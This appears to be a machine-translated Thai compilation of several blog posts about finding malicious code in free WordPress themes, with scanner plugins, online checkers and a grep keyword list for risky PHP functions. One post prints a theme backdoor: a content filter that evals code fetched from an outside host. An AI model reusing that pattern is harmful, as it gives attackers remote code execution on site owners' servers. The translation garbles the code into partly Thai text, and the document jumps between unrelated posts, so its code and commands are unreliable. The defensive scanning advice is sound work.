สวัสดีเพื่อน. คุณแน่ใจหรือไม่ว่าเทมเพลต WordPress ฟรีที่คุณใช้สำหรับเว็บไซต์และบล็อกของคุณนั้นปลอดภัยจริง ๆ และไม่มีภัยคุกคามที่ซ่อนอยู่และรหัสที่เป็นอันตราย คุณแน่ใจอย่างสมบูรณ์เกี่ยวกับเรื่องนี้หรือไม่? อย่างแน่นอน?)
คุณคิดว่าพวกเขาเรียกใช้เทมเพลตจนเสร็จ ลบลิงก์ที่ซ่อนอยู่ออกจากเทมเพลต เท่านี้ก็เสร็จเรียบร้อย คุณสแกนไฟล์ไซต์เป็นระยะด้วยโปรแกรมป้องกันไวรัส ดูเครื่องมือของผู้ดูแลเว็บ Yandex ในแท็บความปลอดภัย และคุณจะเห็นข้อความที่นั่น: “ ไม่พบรหัสที่เป็นอันตรายบนเว็บไซต์«.
นั่นคือสิ่งที่ฉันคิดเช่นกัน ฉันไม่อยากทำให้คุณเสียใจ แต่...
รหัสอันตรายที่ซ่อนอยู่ในธีม WordPress ฟรี
นี่คือจดหมายที่ฉันได้รับเมื่อสัปดาห์ที่แล้วทางไปรษณีย์จากโฮสติ้งของฉัน เมื่อเร็ว ๆ นี้ พวกเขาได้แนะนำการตรวจสอบไฟล์ไซต์ทั้งหมดเป็นประจำเพื่อหาเนื้อหาที่เป็นอันตราย แต่พวกเขากลับพบเนื้อหานี้ในตัวฉัน!
ทุกอย่างเริ่มต้นด้วยความจริงที่ว่าวันหนึ่งฉันไปที่ไซต์ของฉันและไม่สามารถเปิดใช้งานได้ - คำจารึกที่ไม่เหมาะสมเกี่ยวกับไฟล์ที่ไม่พบที่มีนามสกุล php ออกมา ฉันไปศึกษาเนื้อหาของโฟลเดอร์กับไซต์บนโฮสติ้งและพบปัญหาทันที - ไฟล์เทมเพลต fuctions.php ของฉันถูกเปลี่ยนชื่อเป็น functions.php.malware ซึ่งบอกใบ้อย่างคลุมเครือ - โปรแกรมป้องกันไวรัสหรืออะไรทำนองนั้นทำงานที่นี่) เมื่อป้อนอีเมลแล้วฉันก็พบรายงานข้างต้นจากโฮสต์
แน่นอนว่าสิ่งแรกที่ฉันทำคือตรวจสอบ ไฟล์ที่กำหนดศึกษาเนื้อหา สแกนด้วยโปรแกรมป้องกันไวรัสต่างๆ มากมาย บริการออนไลน์เพื่อตรวจหาไวรัส ฯลฯ - ในท้ายที่สุด ฉันไม่พบอะไรเลย ทุกคนยืนยันเป็นเอกฉันท์ว่าไฟล์นั้นปลอดภัยอย่างสมบูรณ์ แน่นอน ฉันแสดงความสงสัยกับโฮสต์โดยบอกว่าคุณทำบางอย่างผิดพลาด แต่ในกรณีนี้ ฉันขอให้พวกเขาส่งรายงานเกี่ยวกับการค้นพบโค้ดที่เป็นอันตราย
และนี่คือสิ่งที่พวกเขาบอกฉัน
ฉันไปที่ google ข้อมูลเกี่ยวกับรหัสนี้และคิดอย่างจริงจังเกี่ยวกับมัน ...
วิธีค้นหาโค้ดที่เป็นอันตรายในเทมเพลต
เมื่อปรากฎว่านี่เป็นเคล็ดลับที่ไม่สำคัญซึ่งช่วยให้ผู้สนใจสามารถถ่ายโอนข้อมูลไปยังไซต์ของคุณและเปลี่ยนเนื้อหาของหน้าเว็บโดยที่คุณไม่รู้ตัว! หากคุณใช้เทมเพลตฟรี ฉันขอแนะนำให้ตรวจสอบ functions.php ของคุณสำหรับรหัสต่อไปนี้:
add_filter('the_content', '_bloginfo', 10001);
ฟังก์ชัน _bloginfo($เนื้อหา)(
โพสต์ทั่วโลก $;
ถ้า (is_single () && ( [ป้องกันอีเมล](get_option('blogoption'))) !== เท็จ)(
คืน $co;
) อย่างอื่นกลับ $content;
}
แม้ว่าฉันจะมีความรู้ด้าน php อย่างตื้นๆ แต่ก็ยังเห็นได้ว่ามีการสร้างตัวกรองบางอย่างที่เชื่อมโยงกับโพสต์ตัวแปรส่วนกลางและเนื้อหา ซึ่งมีหน้าที่รับผิดชอบในการแสดงเนื้อหาเฉพาะในหน้าโพสต์บล็อก (เงื่อนไข is_single) น่าสงสัยอยู่แล้วใช่ไหม? ทีนี้มาดูกันว่าสิ่งนี้จะแสดงอะไร รหัสที่กำหนดบนเว็บไซต์ของเรา
ตัวเลือกบล็อกที่น่าสนใจที่ร้องขอในฐานข้อมูลก็ดูน่าสงสัยเช่นกัน เราไปที่ฐานของเรา ข้อมูล MySQLและเราพบว่ามีตารางชื่อ wp_options หากคุณไม่ได้เปลี่ยนคำนำหน้า ก็จะมีลักษณะเช่นนี้ตามค่าเริ่มต้น และในนั้นเราพบบรรทัดที่เราสนใจที่เรียกว่า blogoption
อะไรสวย! เราเห็นตัวเลือกต่อไปนี้
ส่งคืน eval (file_get_contents ('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));
เหล่านั้น. เราจากบางไซต์ (ยิ่งไปกว่านั้น รัสเซียด้วย) ส่งคืนเนื้อหาที่สามารถบรรทุกอะไรก็ได้! ลิงก์จำนวนเท่าใดก็ได้ รหัสที่เป็นอันตราย ข้อความที่ถูกแก้ไข ฯลฯ เมื่อเข้าถึงไซต์เองจะให้ข้อผิดพลาดในการเข้าถึง 403 ซึ่งไม่น่าแปลกใจ แน่นอน ฉันลบตัวเลือกนี้ออกจากฐานข้อมูลด้วย
จากข้อมูลของผู้ที่ตกเป็นเหยื่อ เนื้อหาของบทความของคุณมักจะถูกส่งคืนโดยมีการแก้ไขเพียงครั้งเดียว แทนที่จะเป็นจุด "." ลิงค์เปิดถูกปิดบังในข้อความ! อย่างไรก็ตาม ตัวเลือกนี้เขียนลงในฐานข้อมูลเมื่อติดตั้งเทมเพลตเอง จากนั้นโค้ดที่ทำสิ่งนี้จะทำลายตัวเองอย่างปลอดภัย และฉันใช้ชีวิตอยู่กับขยะแบบนี้มาสองปีแล้ว และไม่มีโปรแกรมป้องกันไวรัสหรือบริการใดเปิดเผยให้ฉันเห็น ภัยคุกคามนี้ตลอดเวลานั้น พูดตามตรง ฉันไม่ได้สังเกตว่าเทคนิคนี้เคยได้ผลกับฉันหรือไม่ หรือปลั๊กอินความปลอดภัยของฉันปิดกั้นความเป็นไปได้นี้ (หรือบางทีหนึ่งในการอัปเดต WordPressa ปิดช่องโหว่นี้) แต่ก็ยังไม่เป็นที่พอใจ
คุณธรรมของชีสฟรี
คุณชอบความซับซ้อนของ "ผู้แปล" เทมเพลตของเรา (หรือผู้ที่โพสต์ไว้ในแคตตาล็อก) อย่างไร คุณไม่จำเป็นต้องตัดลิงก์ออกจากส่วนท้าย) น่าเสียดายที่ฉันจำไม่ได้ว่าดาวน์โหลดเทมเพลตจากที่ใด มันนานมาแล้ว ไม่เช่นนั้นฉันคงเขียนข้อความที่น่ารักสองสามอัน และถ้าตอนนั้นฉันมีประสบการณ์แบบเดียวกับตอนนี้ ฉันจะไม่ใช้เทมเพลตฟรีหรือในกรณีที่รุนแรง ฉันจะไม่ดาวน์โหลดจากแหล่งที่ไม่รู้จักอย่างแน่นอน!
ง่ายกว่าที่จะซื้อเทมเพลตพรีเมียมอย่างเป็นทางการในราคา 15-20 เหรียญสำหรับเทมเพลตเดียวกันและใช้ชีวิตอย่างสงบสุขโดยรู้ว่าไม่มีช่องโหว่และลิงก์ที่เข้ารหัส และแม้ว่าจะมีช่องโหว่ นักพัฒนาซอฟต์แวร์จะปล่อยการอัปเดตอย่างแน่นอน รูเหล่านี้จะถูกปิด ( อย่างไรก็ตาม Artem เพิ่งเผยแพร่บทความที่เขาเพิ่งพูดถึงเทมเพลตพรีเมียมและแจกรหัสส่งเสริมการขายสำหรับส่วนลดสุดโหดสำหรับผู้ที่สนใจ)
WordPress เป็นเครื่องมือยอดนิยมสำหรับการสร้างเว็บไซต์และบล็อกข้อมูลต่างๆ ความปลอดภัยของเว็บไซต์ของคุณเป็นมากกว่าความปลอดภัยของข้อมูลของคุณ สิ่งนี้สำคัญกว่ามาก เนื่องจากเป็นความปลอดภัยของผู้ใช้ทุกคนที่อ่านแหล่งข้อมูลของคุณและไว้วางใจ ด้วยเหตุนี้จึงเป็นสิ่งสำคัญมากที่ไซต์จะไม่ติดไวรัสหรือรหัสที่เป็นอันตรายอื่นใด
เราจะพูดถึงวิธีการปกป้อง WordPress จากการแฮ็กในบทความต่อไปนี้ แต่ตอนนี้ฉันอยากจะบอกคุณถึงวิธีตรวจสอบไซต์ WordPress ของคุณเพื่อหาไวรัสและรหัสที่เป็นอันตรายเพื่อให้แน่ใจว่าทุกอย่างปลอดภัย
ตัวเลือกแรกที่นึกถึงก็คือแฮ็กเกอร์ได้แฮ็กคุณและสร้างแบ็คดอร์ในโค้ดไซต์ของคุณ เพื่อให้สามารถส่งสแปม ใส่ลิงก์ และสิ่งไม่ดีอื่นๆ เหตุการณ์นี้อาจเกิดขึ้นได้ในบางครั้ง แต่จะเกิดขึ้นได้ยากหากคุณอัปเดตซอฟต์แวร์ตรงเวลา
มีธีมและปลั๊กอิน WordPress ฟรีหลายพันรายการและนี่คือจุดที่อันตรายอยู่ เป็นสิ่งหนึ่งเมื่อคุณดาวน์โหลดเทมเพลตจากไซต์ WordPress และอีกสิ่งหนึ่งเมื่อคุณพบในไซต์ด้านซ้าย นักพัฒนาที่ไร้ยางอายสามารถฝังโค้ดที่เป็นอันตรายต่างๆ ลงในผลิตภัณฑ์ของตนได้ มีความเสี่ยงมากขึ้นหากคุณดาวน์โหลดเทมเพลตพรีเมียมฟรี ซึ่งแฮ็กเกอร์สามารถเพิ่มช่องโหว่ด้านความปลอดภัยบางประเภทโดยไม่ต้องเสี่ยงอะไรเลย ซึ่งพวกเขาสามารถเจาะทะลุและทำในสิ่งที่ต้องการได้ นั่นเป็นเหตุผลว่าทำไมการตรวจสอบไวรัสในไซต์ wordpress ของคุณจึงเป็นเรื่องสำคัญ
ตรวจสอบเว็บไซต์ wordpress เพื่อหาไวรัส
สิ่งแรกที่ต้องดูเมื่อตรวจสอบไซต์ไม่ใช่ไวรัส แต่เป็นปลั๊กอิน WordPress คุณสามารถสแกนไซต์ของคุณอย่างรวดเร็วและง่ายดายและค้นหาส่วนที่น่าสงสัยของโค้ดที่ควรค่าแก่การค้นหา ไม่ว่าจะเป็นในธีม ปลั๊กอิน หรือแกนหลักของ Wodpress เอง มาดูปลั๊กอินยอดนิยมบางตัวกัน:
1.ทค
ปลั๊กอินที่เรียบง่ายนี้จะตรวจสอบธีมทั้งหมดที่ติดตั้งบนไซต์ของคุณเพื่อหาโค้ดที่เป็นอันตราย ปลั๊กอินตรวจจับลิงก์ที่ซ่อนอยู่ซึ่งเข้ารหัสด้วยการแทรกรหัส base64 และแสดงผลด้วย รายละเอียดข้อมูลเกี่ยวกับปัญหาที่พบ ส่วนใหญ่แล้ว ส่วนต่างๆ ของโค้ดที่พบไม่ใช่ไวรัส แต่อาจเป็นอันตรายได้ ดังนั้นคุณควรใส่ใจกับสิ่งเหล่านี้
เปิด "รูปร่าง" -> "แทค"จากนั้นรอจนครบทุกหัวข้อ
2.VIP สแกนเนอร์
คล้ายกับเครื่องสแกนหัวข้อ TOC มาก แต่มีข้อมูลที่ละเอียดกว่า โอกาสเดียวกันในการตรวจจับลิงก์ โค้ดที่ซ่อนอยู่ และการแทรกที่เป็นอันตรายอื่นๆ เพียงเปิดรายการ VIP Scanner ในส่วนเครื่องมือและวิเคราะห์ผลลัพธ์
การลบไฟล์ที่ไม่จำเป็นเช่น desktop.ini อาจเพียงพอแล้ว หรือคุณต้องดูให้ละเอียดยิ่งขึ้นว่าเกิดอะไรขึ้นในไฟล์โดยใช้ base64
3. แอนตี้มัลแวร์จาก GOTMLS.NET
ปลั๊กอินนี้ไม่เพียงแต่ช่วยให้คุณสแกนธีมและคอร์ของไซต์เพื่อหาไวรัสเท่านั้น แต่ยังช่วยปกป้องไซต์จากการใช้รหัสผ่านอย่างดุร้ายและการโจมตี XSS, SQLInj ต่างๆ การค้นหาจะดำเนินการตามลายเซ็นและช่องโหว่ที่รู้จัก ช่องโหว่บางอย่างสามารถแก้ไขได้ ในการเริ่มสแกนไฟล์ให้เปิด "ต่อต้านมัลแวร์"ในแถบด้านข้างแล้วคลิก "เรียกใช้การสแกน":
ก่อนที่คุณจะเรียกใช้การสแกน คุณต้องอัปเดตฐานข้อมูลลายเซ็น
4. คำพูด
นี่เป็นหนึ่งในปลั๊กอินความปลอดภัยและการสแกนมัลแวร์ของ WordPress ที่ได้รับความนิยมสูงสุด นอกจากสแกนเนอร์ซึ่งสามารถค้นหาบุ๊กมาร์กส่วนใหญ่ในโค้ด WordPress แล้ว ยังมีการป้องกันตามเวลาจริงอีกด้วย ชนิดต่างๆการโจมตีและการโจมตีด้วยกำลังดุร้าย ในระหว่างการค้นหา ปลั๊กอินจะพบ ปัญหาที่เป็นไปได้พร้อมปลั๊กอินและธีมต่างๆ บอกให้คุณอัปเดต WordPress
เปิดแท็บ "กลาโหม WP"ในแถบด้านข้าง จากนั้นไปที่แท็บ "สแกน"และกด "เริ่มสแกน":
การสแกนอาจใช้เวลา เวลาที่แน่นอนแต่เมื่อเสร็จสิ้น คุณจะเห็นรายงานโดยละเอียดเกี่ยวกับปัญหาที่พบ
5.แอนตี้ไวรัส
นี่เป็นอีกหนึ่งปลั๊กอินง่ายๆ ที่จะสแกนเทมเพลตเว็บไซต์ของคุณเพื่อหาโค้ดที่เป็นอันตราย ข้อเสียคือสแกนเฉพาะเทมเพลตปัจจุบัน แต่ข้อมูลจะแสดงในรายละเอียดเพียงพอ คุณจะเห็นฟีเจอร์อันตรายทั้งหมดที่ธีมมี จากนั้นคุณสามารถวิเคราะห์โดยละเอียดได้ว่าฟีเจอร์เหล่านี้ก่อให้เกิดอันตรายหรือไม่ ค้นหารายการ "แอนตี้ไวรัส"ในการตั้งค่าแล้วคลิก "สแกนเทมเพลตธีมทันที":
6. ตัวตรวจสอบความสมบูรณ์
ขอแนะนำให้ตรวจสอบความสมบูรณ์ด้วย ไฟล์เวิร์ดเพรสในกรณีที่ไวรัสได้ลงทะเบียนไว้ที่ใดที่หนึ่งแล้ว ในการทำเช่นนี้ คุณสามารถใช้ปลั๊กอินตัวตรวจสอบความสมบูรณ์ ตรวจสอบไฟล์หลัก ปลั๊กอิน และเทมเพลตทั้งหมดสำหรับการเปลี่ยนแปลง ในตอนท้ายของการสแกน คุณจะเห็นข้อมูลเกี่ยวกับไฟล์ที่แก้ไข
บริการออนไลน์
นอกจากนี้ยังมีบริการออนไลน์หลายอย่างที่ให้คุณตรวจสอบไซต์ wordpress เพื่อหาไวรัสหรือเพียงแค่ตรวจสอบเทมเพลต นี่คือบางส่วนของพวกเขา:
themecheck.org- คุณดาวน์โหลดไฟล์เก็บถาวรของธีมและสามารถดูคำเตือนทั้งหมดเกี่ยวกับฟังก์ชันที่อาจเป็นอันตรายที่ใช้ในนั้น คุณไม่สามารถดูข้อมูลเกี่ยวกับธีมของคุณเท่านั้น แต่ยังสามารถดูเกี่ยวกับธีมอื่น ๆ ที่อัปโหลดโดยผู้ใช้รายอื่นได้อีกด้วย รุ่นต่างๆหัวข้อ ทุกสิ่งที่ปลั๊กอินค้นหาสามารถพบได้ในไซต์นี้ การตรวจสอบ ธีมเวิร์ดเพรสก็มีความสำคัญมากเช่นกัน
virustotal.com- แหล่งข้อมูลที่รู้จักกันดีซึ่งคุณสามารถตรวจสอบไซต์หรือไฟล์เทมเพลตของคุณเพื่อหาไวรัส
ReScan.pro- ตรวจสอบไซต์ WordPress เพื่อหาไวรัสโดยใช้บริการนี้ได้ฟรี การวิเคราะห์แบบคงที่และไดนามิกจะดำเนินการเพื่อตรวจหาการเปลี่ยนเส้นทางที่เป็นไปได้ เครื่องสแกนจะเปิดหน้าต่างๆ ของไซต์ ตรวจสอบไซต์กับบัญชีดำต่างๆ
sitecheck.sucuri.net- บริการง่ายๆ สำหรับสแกนไซต์และธีมสำหรับไวรัส มีปลั๊กอินสำหรับ WordPress ตรวจจับลิงก์และสคริปต์ที่เป็นอันตราย
ตรวจสอบด้วยตนเอง
ไม่มีอะไรจะดีไปกว่าการยืนยันด้วยตนเอง ลีนุกซ์มียูทิลิตี้ grep ที่ยอดเยี่ยมที่ให้คุณค้นหาการเกิดขึ้นของสตริงตามอำเภอใจในโฟลเดอร์ที่มีไฟล์ ยังคงต้องเข้าใจว่าเราจะมองหาอะไร:
eval - ฟังก์ชั่นนี้ให้คุณดำเนินการตามอำเภอใจ รหัส php.iniไม่ได้ใช้โดยผลิตภัณฑ์ที่เคารพตนเอง หากหนึ่งในปลั๊กอินหรือธีมใช้ฟังก์ชันนี้ เกือบ 100% แน่ใจว่ามีไวรัสอยู่ที่นั่น
- base64_decode- ฟังก์ชันการเข้ารหัสสามารถใช้กับ eval เพื่อซ่อนรหัสที่เป็นอันตรายได้ แต่สามารถใช้เพื่อวัตถุประสงค์ที่ไม่สงบได้ ดังนั้นโปรดใช้ความระมัดระวัง
- sha1- วิธีอื่นในการเข้ารหัสรหัสที่เป็นอันตราย
- gzinflate- ฟังก์ชันการบีบอัด เป้าหมายเดียวกัน พร้อมด้วย eval เช่น gzinflate(base64_decode(code)
- สเตรฟ- พลิกสตริงไปข้างหลังก่อนเนื่องจากสามารถใช้ตัวแปรสำหรับการเข้ารหัสดั้งเดิมได้
- พิมพ์- การพิมพ์ข้อมูลไปยังเบราว์เซอร์ร่วมกับ gzinflate หรือ base64_decode นั้นเป็นอันตราย
- file_put_contents- WordPress เองหรือปลั๊กอินยังคงสามารถสร้างไฟล์ในระบบไฟล์ได้ แต่ถ้าธีมสร้างได้ คุณควรระวังและตรวจสอบว่าเหตุใดจึงต้องใช้ เนื่องจากไวรัสสามารถติดตั้งได้
- file_get_contents- ในกรณีส่วนใหญ่จะใช้เพื่อจุดประสงค์ทางสันติ แต่สามารถใช้เพื่อดาวน์โหลดรหัสที่เป็นอันตรายหรืออ่านข้อมูลจากไฟล์
- ขด- เรื่องเดียวกัน
- เปิด- เปิดไฟล์เพื่อเขียน คุณไม่มีทางรู้ว่าอะไร;
- ระบบ- ฟังก์ชั่นรันคำสั่งในระบบ Linux หากทำโดยธีม ปลั๊กอิน หรือเวิร์ดเพรสเอง เป็นไปได้มากว่าจะมีไวรัส
- ลิงค์สัญลักษณ์- สร้างลิงก์สัญลักษณ์ในระบบ บางทีไวรัสอาจพยายามสร้างลิงก์หลัก ระบบไฟล์หาได้จากภายนอก
- สำเนา- คัดลอกไฟล์จากที่หนึ่งไปยังอีกที่หนึ่ง
- รับcwd- ส่งคืนชื่อไดเร็กทอรีการทำงานปัจจุบัน
- ใบสั่ง- เปลี่ยนไดเร็กทอรีการทำงานปัจจุบัน
- ini_get- รับข้อมูลเกี่ยวกับการตั้งค่า PHP บ่อยครั้งเพื่อจุดประสงค์ที่สันติ แต่คุณไม่มีทางรู้
- error_reporting(0)- ปิดใช้งานเอาต์พุตของข้อความแสดงข้อผิดพลาด
- window.top.location.href- ฟังก์ชันจาวาสคริปต์ใช้สำหรับเปลี่ยนเส้นทางไปยังหน้าอื่น
- ถูกแฮ็ก- ดังนั้นในกรณีที่เราตรวจสอบทันใดนั้นแฮ็กเกอร์ก็ตัดสินใจบอกเรา
คุณสามารถแทนที่แต่ละคำในคำสั่งดังนี้:
grep -R "แฮ็ก" /var/www/path/to/files/wordpress/wp-content/
หรือใช้สคริปต์ง่าย ๆ ที่จะค้นหาคำทั้งหมดในครั้งเดียว:
ค่า = "base64_decode (
eval(base64_decode
gzinflate (ฐาน 64_decode (
getcwd();
สเตรฟ(
chr(หรือ(
ใบสั่ง
ini_get
window.top.location.href
สำเนา(
อีวาล(
ระบบ(
ซิมลิงค์(
error_reporting(0)
พิมพ์
file_get_contents(
file_put_contents(
เปิด(
ถูกแฮ็ก"
ซีดี /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *
สวัสดีเพื่อน ๆ Idea Fox!
ฉันไม่รู้เกี่ยวกับคุณ แต่ฉันนอนไม่หลับตอนกลางคืน ปัญหาด้านความปลอดภัยของบล็อกทำให้ฉันทรมาน ไม่มีอำนาจอีกต่อไป :-)
ฉันอ่านบล็อกจำนวนมากในหัวข้อนี้และทดสอบปลั๊กอินจำนวนมากที่ช่วยแก้ปัญหานี้ ใช่และพวกเขาเริ่มถามคำถามในหัวข้อการปกป้องไซต์ในความคิดเห็นซึ่งทำให้ฉันเขียนบันทึกนี้
แค่จินตนาการว่าคุณกำลังเขียนบล็อก เขียนบทความ พยายาม ... และไอ้ชั่วก็มาทำลายเว็บไซต์ของคุณ ฉันคิดว่าจะต้องผิดหวังมากแน่ๆ
ท้ายที่สุดบล็อกเกอร์ทั่วไปทุกคนลงทุนเวลาและความพยายามอย่างมากในการพัฒนาเว็บไซต์ของเขา และสำหรับหลาย ๆ คน การเขียนบล็อกมักจะกลายเป็นความหลงใหล ... ต่อไปนี้และต่อไป หากสิ่งนี้เกิดขึ้น :-)
คุณเข้าใจดีว่าสิ่งนี้สำคัญเพียงใด
เรามาเริ่มธุรกิจกันเถอะ :)
สองสามเดือนที่ผ่านมาฉันได้เขียนบันทึกเกี่ยวกับการแฮ็ค อย่าลืมอ่านมัน แต่เวลาผ่านไปนานมากแล้ว และฉันได้ใช้มาตรการเพิ่มเติมเพื่อเสริมสร้างการป้องกันรอบด้าน
ในบันทึกต่อไปนี้ ฉันจะพูดถึงปัญหานี้โดยละเอียดอย่างแน่นอน (ฉันยังจำและเขียนเกี่ยวกับการตั้งค่า ISP)
3. เราตรวจสอบเว็บไซต์ในบริการออนไลน์อื่นๆ
บริการดังกล่าวหย่าร้างกันจนสุดลูกหูลูกตา ฉันมีความคิดเห็นที่ชัดเจนว่าหลายคนโง่เขลาและสร้างขึ้นเพื่อแสดงโฆษณาเท่านั้น
หมอเว็บ
DR.Web ทำขึ้น บริการที่ดีเพื่อตรวจสอบเว็บไซต์ออนไลน์ โดยส่วนตัวแล้วเขาเคยช่วยฉันค้นหาการติดไวรัสจากเพื่อนในบล็อก (มีรหัสของบุคคลที่สามอยู่ในไฟล์ .htaccess)
การตรวจสอบนั้นง่ายมาก ป้อน URL ของคุณและรอผลการตรวจสอบ
antivirus-alarm.com
โปรแกรมรวบรวมข้อมูลเว็บไซต์ที่มีประสิทธิภาพซึ่งใช้มากถึง 43 ฐานข้อมูลป้องกันไวรัสจากบริษัทแอนตี้ไวรัสชั้นนำของโลก
ที่นี่เช่นกันทุกอย่างง่ายมาก เราขับรถไปที่ URL ของไซต์ของเราและเรากำลังรอผลการสแกนด้วยลมหายใจซึ้งน้อยลง
นี่คือสิ่งที่ฉันรอคอย
ทุกอย่างสะอาด คุณสามารถนอนหลับได้อย่างสงบสุข :-)
ทั้งหมดนี้เป็นสิ่งที่ดีอย่างแน่นอน แต่คุณต้องติดตั้งปลั๊กอินสองสามตัวที่ไม่รบกวนบล็อก WordPress เลย
4. ขอให้โฮสต์ตรวจสอบไซต์ของคุณ
ความจริงก็คือโฮสต์กังวลเกี่ยวกับปัญหาด้านความปลอดภัยมากกว่าคุณและมีเครื่องมือป้องกันที่มีประสิทธิภาพ และวิธีการป้องกันเฉพาะทาง
นี่คือข่าวของฉันสำหรับคุณในวันนี้ ต่อไปจะพูดถึง ปลั๊กอินที่มีประสิทธิภาพซึ่งช่วยให้คุณสามารถปกป้องบล็อก WordPress ของคุณจากการแฮ็คได้อย่างมาก
ฉันทำงานกับเขามา 2 เดือนแล้วและฉันก็พอใจกับเขามาก จนถึงตอนนี้ฉันจัดการกับเขา 3 ครั้งและห้ามตัวเอง: -) สรุปคือมีอะไรจะบอก
หนึ่งใน เหตุการณ์สำคัญเมื่อสร้างบล็อก - เลือกเทมเพลตคุณภาพสูง มีหลายไซต์ทั้งแบบเสียเงินและแบบฟรี อย่างไรก็ตาม คุณต้องระวังที่นี่ เนื่องจากมีโอกาสสูงที่คุณจะได้รับไวรัส สคริปต์ที่เป็นอันตราย และลิงก์ที่ซ่อนอยู่พร้อมกับไฟล์
แต่แม้ว่าเทมเพลตจะสะอาดในแง่ของความปลอดภัย และการออกแบบ การใช้งาน และฟังก์ชันการทำงานที่เหมาะกับคุณอย่างสมบูรณ์ แต่ก็ไม่ได้หมายความว่าทุกอย่างจะเป็นไปตามลำดับ ธีมต้องมีโค้ด HTML และ CSS ที่ถูกต้อง รวมทั้งเป็นไปตามมาตรฐานทั้งหมด ซีเอ็มเอส เวิร์ดเพรส. แม้แต่ธีมที่ต้องชำระเงินและเทมเพลตแบบกำหนดเองก็ยังมีปัญหากับรูปแบบหลัง
ผู้พัฒนาเอ็นจิ้นกำลังพัฒนามันอย่างต่อเนื่อง และผู้สร้างเทมเพลทก็ไม่ได้ตามทันพวกเขาเสมอไป โดยใช้ฟังก์ชันที่เลิกใช้แล้วเมื่อสร้างมันขึ้นมา
วันนี้ฉันจะแสดงให้คุณเห็น 2 วิธีในการตรวจสอบธีม WordPress ว่าเป็นไปตามมาตรฐานหรือไม่ เครื่องมือเหล่านี้ใช้เมื่อมีการเพิ่มลงในไดเร็กทอรีทางการ https://wordpress.org/themes/
บริการตรวจสอบธีม WordPress และ Joomla templates ว่าเป็นไปตามมาตรฐาน
ThemeCheck.org คือ บริการฟรีซึ่งช่วยให้คุณตรวจสอบความปลอดภัยและคุณภาพของเทมเพลตสำหรับ CMS WordPress และ Joomla ก่อนติดตั้งบนเว็บไซต์
หากต้องการตรวจสอบธีม ให้อัปโหลดไฟล์เก็บถาวรจากคอมพิวเตอร์ของคุณโดยคลิกปุ่ม "เลือกไฟล์" บนเว็บไซต์ themecheck.org หากคุณไม่ต้องการให้บันทึกผลการสแกนในบริการและให้บริการแก่ผู้ใช้รายอื่น ให้ทำเครื่องหมายที่ “ ลืมข้อมูลที่อัปโหลดหลังจากผลลัพธ์“. ตอนนี้กดปุ่ม "ส่ง"
ตัวอย่างเช่นฉันเอาหัวข้อ อินเตอร์เฟซดาวน์โหลดจากเว็บไซต์อย่างเป็นทางการ 99 จาก 100 - 0 ข้อผิดพลาดที่สำคัญและคำเตือน 1 ครั้ง นี่เป็นผลลัพธ์ที่ดีมาก
ในการเปรียบเทียบ เทมเพลตบล็อกของฉันได้รับคะแนน 0 (ข้อผิดพลาด 14 รายการและคำเตือน 23 รายการ) ฉันคิดว่าสำหรับหลาย ๆ คน ผลลัพธ์จะไม่แตกต่างกันมากนัก โดยเฉพาะอย่างยิ่งหากหัวข้อนั้นล้าสมัยไปแล้ว ความคิดเห็นทั้งหมดพร้อมคำอธิบาย ระบุไฟล์และบรรทัดที่พบ อยู่ในหน้าเดียวกันด้านล่าง
ตรงไปตรงมาฉันไม่เข้าใจมากนักมันจะมีประโยชน์มากกว่าสำหรับผู้เขียนและฉันจะเปลี่ยนเทมเพลตได้ง่ายกว่าการแก้ไขทุกอย่าง ฉันแค่ไม่รู้ว่าเมื่อไหร่ฉันจะไปถึงที่นั่น
หน้าแรกมีชุดรูปแบบเว็บ WordPress และ Joomla ที่ทดสอบก่อนหน้านี้ให้เลือกมากมายพร้อมความสามารถในการจัดเรียงตามเวลาที่เพิ่มหรือจัดอันดับ เมื่อคุณคลิกที่สิ่งเหล่านี้ คุณจะเห็นข้อมูลโดยละเอียดและลิงก์ไปยังเว็บไซต์ของผู้เขียนและหน้าดาวน์โหลด
หากคุณเป็นผู้พัฒนาและธีมของคุณถูกต้อง 100% คุณสามารถแจ้งให้ผู้ใช้ทราบได้โดยตั้งค่าตราคะแนนพิเศษบนนั้น
คุณค่าของบริการ ThemeCheck.org คือเว็บมาสเตอร์สามารถใช้เพื่อเลือกธีมที่มีคุณภาพก่อนที่จะติดตั้งในบล็อก
ปลั๊กอินตรวจสอบธีม
คุณสามารถตรวจสอบเทมเพลตที่ติดตั้งไว้แล้วว่าเข้ากันได้กับมาตรฐานล่าสุดของ WordPress โดยใช้ปลั๊กอินตรวจสอบธีม ลิ้งค์ดาวน์โหลด รุ่นล่าสุด: https://wordpress.org/plugins/theme-check/
ฟังก์ชันการทำงานของปลั๊กอินคล้ายกับบริการที่ฉันอธิบายไว้ข้างต้น ไม่จำเป็นต้องทำการตั้งค่าใดๆ หลังจากติดตั้งและเปิดใช้งานมาตรฐานแล้ว ตรวจสอบการสั่งซื้อ:
- ไปที่แผงการดูแลระบบในหน้าเมนู “ ลักษณะที่ปรากฏ"-" ตรวจสอบธีม"
- เลือกธีมที่ต้องการจากรายการดรอปดาวน์ หากมีการติดตั้งไว้หลายรายการ
- ทำเครื่องหมายที่ช่อง “ระงับ INFO” หากคุณไม่ต้องการส่งข้อมูล
- คลิกปุ่ม "ตรวจสอบ"
ผลลัพธ์จะแสดงในหน้าเดียวกัน
อย่างที่คุณเห็น ธีมเริ่มต้น ยี่สิบสิบก็ไม่เหมาะเช่นกัน แต่ตัวอย่างเช่น ยี่สิบสี่ไม่มีข้อผิดพลาด
หลังจากตรวจสอบปลั๊กอินแล้ว คุณสามารถปิดใช้งานได้ และควรลบออกพร้อมกันจนกว่าจะถึงครั้งต่อไป
บทสรุป.ก่อนติดตั้งเทมเพลต WordPress ใหม่ ไม่เพียงตรวจสอบ ลิงค์ที่ซ่อนอยู่และรหัสที่เป็นอันตรายด้วยปลั๊กอิน TAC แต่ยังรวมถึงบริการ ThemeCheck.org หรือปลั๊กอิน Theme Check เพื่อให้สอดคล้องกับมาตรฐาน CMS ล่าสุด
